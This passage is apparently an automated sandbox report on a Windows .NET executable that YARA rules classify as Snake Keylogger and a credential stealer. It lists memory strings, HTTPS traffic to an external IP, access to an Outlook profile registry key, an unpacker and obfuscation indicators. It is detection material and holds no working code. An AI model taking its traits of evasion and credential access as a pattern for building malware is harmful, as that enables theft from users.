                Source: file.exe, 00000002.00000002.4148149933.0000000004178000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004414000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.000000000414D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.000000000431C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000042F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: file.exe, 00000002.00000002.4148149933.0000000004316000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004364000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.000000000319A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: file.exe, 00000002.00000002.4148149933.0000000004178000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004414000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.000000000414D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.000000000431C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000042F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: file.exe, 00000002.00000002.4144889269.0000000003284000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003275000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.000000000319A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: file.exe, 00000002.00000002.4144889269.000000000327F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: file.exe PID: 7692, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6E5A40_2_00E6E5A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D518600_2_06D51860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D500400_2_06D50040
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D518510_2_06D51851
                Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0158C1472_2_0158C147
                Source: C:\Users\user\Desktop\file.exeCode function: 2_2_015871182_2_01587118
                Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0158A0882_2_0158A088
                Source: C:\Users\user\Desktop\file.exeCode function: 2_2_015853622_2_01585362
                Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0158D2782_2_0158D278
                Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0158C4682_2_0158C468
                Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0158C7382_2_0158C738
                Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0158E9882_2_0158E988
                Source: C:\Users\user\Desktop\file.exeCode function: 2_2_015869A02_2_015869A0
                Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01583B952_2_01583B95
                Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0158CA082_2_0158CA08
                Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0158CCD82_2_0158CCD8
                Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0158CFAA2_2_0158CFAA
                Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01583E092_2_01583E09
                Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0158E97A2_2_0158E97A
                Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0158F9612_2_0158F961
                Source: C:\Users\user\Desktop\file.exeCode function: 2_2_015829EC2_2_015829EC
                Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01583AA12_2_01583AA1
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1248
                Source: file.exe, 00000000.00000002.1824710332.0000000000B8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                Source: file.exe, 00000000.00000000.1674901502.000000000050A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezoBx.exe8 vs file.exe
                Source: file.exe, 00000000.00000002.1825418073.0000000002B72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs file.exe
                Source: file.exe, 00000000.00000002.1827801084.0000000005180000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs file.exe
                Source: file.exe, 00000000.00000002.1825418073.0000000002A5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs file.exe
                Source: file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs file.exe
                Source: file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs file.exe
                Source: file.exe, 00000000.00000002.1829845956.0000000007550000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs file.exe
                Source: file.exe, 00000000.00000002.1825418073.0000000002A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs file.exe
                Source: file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs file.exe
                Source: file.exe, 00000002.00000002.4143512458.0000000001137000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs file.exe
                Source: file.exeBinary or memory string: OriginalFilenamezoBx.exe8 vs file.exe
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: file.exe PID: 7692, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.file.exe.3c2d060.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.file.exe.3c2d060.1.raw.unpack, -i.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.file.exe.3c2d060.1.raw.unpack, -i.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.file.exe.3c70280.3.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.file.exe.3c70280.3.raw.unpack, -i.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.file.exe.3c70280.3.raw.unpack, -i.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, vnF8bQU8cHxQZQTDPO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, MUKi7nQ9sYvdsQsUSw.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, MUKi7nQ9sYvdsQsUSw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, MUKi7nQ9sYvdsQsUSw.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.file.exe.7550000.5.raw.unpack, vnF8bQU8cHxQZQTDPO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.file.exe.7550000.5.raw.unpack, MUKi7nQ9sYvdsQsUSw.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.file.exe.7550000.5.raw.unpack, MUKi7nQ9sYvdsQsUSw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.file.exe.7550000.5.raw.unpack, MUKi7nQ9sYvdsQsUSw.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/6@3/3
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
                Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7568
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\d29f8d37-5fb3-45b7-91e2-e835e38e5bb0Jump to behavior
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeVirustotal: Detection: 42%
                Source: file.exeReversingLabs: Detection: 42%
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1248
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Xml.ni.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: mscorlib.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: Accessibility.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.ni.pdbRSDS source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Drawing.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: mscorlib.ni.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Core.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Configuration.ni.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Configuration.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: Microsoft.VisualBasic.pdbC source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Xml.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.ni.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERB432.tmp.dmp.5.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Core.ni.pdb source: WERB432.tmp.dmp.5.dr

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, MUKi7nQ9sYvdsQsUSw.cs.Net Code: b8fOFGF281 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.file.exe.7550000.5.raw.unpack, MUKi7nQ9sYvdsQsUSw.cs.Net Code: b8fOFGF281 System.Reflection.Assembly.Load(byte[])
                Source: file.exeStatic PE information: section name: .text entropy: 7.859078791569036
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, HyrVjh9CacVo9sXnV4.csHigh entropy of concatenated method names: 'TqcJU9MtB4', 'RhCJg5yxnH', 'pNPJyqfJr3', 'kBPJtEGKNx', 'LX2JVM1k2x', 'QRvJo8xwQH', 'Xw9JsVEiws', 'Lm5JInXkYD', 'VN8JaIks2b', 'IltJjbvrF6'
